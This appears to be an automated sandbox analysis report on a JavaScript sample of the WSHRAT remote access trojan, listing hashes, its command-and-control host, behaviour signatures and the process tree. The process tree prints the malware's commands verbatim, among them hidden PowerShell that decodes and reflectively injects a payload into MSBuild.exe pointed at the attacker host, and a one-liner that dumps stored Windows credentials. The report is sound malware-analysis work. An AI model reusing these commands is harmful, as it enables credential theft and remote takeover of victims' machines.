Analysis

  • max time kernel
    151s
  • max time network
    181s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    14/10/2021, 10:12

General

  • Target

    ID-92164.js

  • Size

    1.0MB

  • MD5

    2e49ab9cb1bcc2aef854c4ea0f4172b9

  • SHA1

    9762fe64cdda7ca49f4247d8dd7497e8f6ef295e

  • SHA256

    f9490f2e724d5ca5edd30a552f09f27b59b608361143e95edcc3ef860958ea5e

  • SHA512

    3dfbbf4b7d3bd3091a3694319e9524baaf05b6db6c212fa73cbaf2df488a4aa104c057839434e7b766b8e2f603b94279d87f5139851516561397dd463c8f458f

Malware Config

Extracted

Family

wshrat

C2

http://3laallah.myvnc.com:5555

Signatures

  • WSHRAT

    WSHRAT is a variant of Houdini worm and has vbs and js variants.

  • Blocklisted process makes network request 17 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 21 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 3 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Script User-Agent 15 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\ID-92164.js
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1208
    • C:\Windows\regedit.exe
      "regedit.exe" "C:\Users\Admin\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg"
      2⤵
      • Runs .reg file with regedit
      PID:1176
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1640
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:856
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'3laallah.myvnc.com 5555 \"WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands\" 1'));"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1680
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        path 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 1
        3⤵
          PID:1516
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          path 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 1
          3⤵
            PID:1320
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            path 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 1
            3⤵
              PID:1920
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              path 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 1
              3⤵
                PID:1464
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                path 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 1
                3⤵
                  PID:1016
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:988
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Local\Temp\wshsdk" && C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll > "C:\Users\Admin\AppData\Local\Temp\wshout"
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1072
                • C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe
                  C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1708
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1696
                • C:\Windows\system32\taskkill.exe
                  taskkill /F /IM cmdc.exe
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1092
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1484
                • C:\Windows\system32\taskkill.exe
                  taskkill /F /IM cmdc.exe
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1788
              • C:\Users\Admin\AppData\Local\Temp\cmdc.exe
                "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
                2⤵
                • Executes dropped EXE
                PID:1548
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:596
                • C:\Windows\system32\taskkill.exe
                  taskkill /F /IM cmdc.exe
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1120
              • C:\Users\Admin\AppData\Local\Temp\cmdc.exe
                "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
                2⤵
                • Executes dropped EXE
                • Accesses Microsoft Outlook accounts
                PID:1760
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"
                2⤵
                  PID:1436

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/856-79-0x00000000023C0000-0x00000000023C1000-memory.dmp

                Filesize

                4KB

              • memory/856-82-0x000000001ABE4000-0x000000001ABE6000-memory.dmp

                Filesize

                8KB

              • memory/856-81-0x000000001ABE0000-0x000000001ABE2000-memory.dmp

                Filesize

                8KB

              • memory/856-80-0x00000000022E0000-0x00000000022E1000-memory.dmp

                Filesize

                4KB

              • memory/856-77-0x0000000002380000-0x0000000002381000-memory.dmp

                Filesize

                4KB

              • memory/856-78-0x000000001AC60000-0x000000001AC61000-memory.dmp

                Filesize

                4KB

              • memory/856-85-0x000000001C160000-0x000000001C161000-memory.dmp

                Filesize

                4KB

              • memory/856-84-0x000000001B700000-0x000000001B701000-memory.dmp

                Filesize

                4KB

              • memory/988-100-0x0000000002240000-0x0000000002241000-memory.dmp

                Filesize

                4KB

              • memory/988-103-0x000000001AC24000-0x000000001AC26000-memory.dmp

                Filesize

                8KB

              • memory/988-106-0x000000001B850000-0x000000001B851000-memory.dmp

                Filesize

                4KB

              • memory/988-105-0x0000000002470000-0x0000000002471000-memory.dmp

                Filesize

                4KB

              • memory/988-104-0x0000000001EC0000-0x0000000001EC1000-memory.dmp

                Filesize

                4KB

              • memory/988-102-0x000000001AC20000-0x000000001AC22000-memory.dmp

                Filesize

                8KB

              • memory/1176-61-0x000007FEFB9F1000-0x000007FEFB9F3000-memory.dmp

                Filesize

                8KB

              • memory/1176-62-0x0000000000410000-0x0000000000411000-memory.dmp

                Filesize

                4KB

              • memory/1548-171-0x0000000075C71000-0x0000000075C73000-memory.dmp

                Filesize

                8KB

              • memory/1640-72-0x000000001B480000-0x000000001B481000-memory.dmp

                Filesize

                4KB

              • memory/1640-67-0x000000001AB10000-0x000000001AB11000-memory.dmp

                Filesize

                4KB

              • memory/1640-66-0x0000000002410000-0x0000000002411000-memory.dmp

                Filesize

                4KB

              • memory/1640-69-0x000000001AA90000-0x000000001AA92000-memory.dmp

                Filesize

                8KB

              • memory/1640-70-0x000000001AA94000-0x000000001AA96000-memory.dmp

                Filesize

                8KB

              • memory/1640-71-0x0000000002370000-0x0000000002371000-memory.dmp

                Filesize

                4KB

              • memory/1640-73-0x000000001B7E0000-0x000000001B7E1000-memory.dmp

                Filesize

                4KB

              • memory/1640-68-0x00000000025F0000-0x00000000025F1000-memory.dmp

                Filesize

                4KB

              • memory/1680-93-0x000000001ABE0000-0x000000001ABE2000-memory.dmp

                Filesize

                8KB

              • memory/1680-94-0x000000001ABE4000-0x000000001ABE6000-memory.dmp

                Filesize

                8KB

              • memory/1680-96-0x0000000002400000-0x0000000002403000-memory.dmp

                Filesize

                12KB